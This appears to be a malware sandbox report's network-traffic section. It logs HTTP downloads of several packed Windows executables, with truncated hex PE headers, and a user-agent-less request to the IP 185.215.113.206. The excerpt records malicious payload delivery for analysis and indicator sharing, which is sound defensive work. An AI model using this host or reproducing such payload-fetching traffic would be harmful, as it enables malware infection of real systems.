Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:55:45 GMTContent-Type: application/octet-streamContent-Length: 919040Last-Modified: Sat, 26 Oct 2024 03:25:48 GMTConnection: keep-aliveETag: "671c613c-e0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 34 61 1c 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 56 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 a0 41 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 f4 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 9b 00 00 00 40 0d 00 00 9c 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 90 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:55:48 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:55:55 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:00 GMTContent-Type: application/octet-streamContent-Length: 1834496Last-Modified: Sat, 26 Oct 2024 03:44:58 GMTConnection: keep-aliveETag: "671c65ba-1bfe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 39 24 1c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 20 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 69 00 00 04 00 00 fa 70 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 68 65 62 78 79 7a 72 00 a0 19 00 00 70 4f 00 00 9c 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 7a 61 79 65 78 74 71 00 10 00 00 00 10 69 00 00 04 00 00 00 d8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 69 00 00 22 00 00 00 dc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:02 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:09 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:12 GMTContent-Type: application/octet-streamContent-Length: 2831360Last-Modified: Sat, 26 Oct 2024 03:26:14 GMTConnection: keep-aliveETag: "671c6156-2b3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2b 00 00 04 00 00 41 7d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 6c 6b 6e 67 6d 71 6b 00 e0 2a 00 00 a0 00 00 00 d4 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6a 6d 6e 62 74 70 6e 00 20 00 00 00 80 2b 00 00 04 00 00 00 0e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2b 00 00 22 00 00 00 12 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
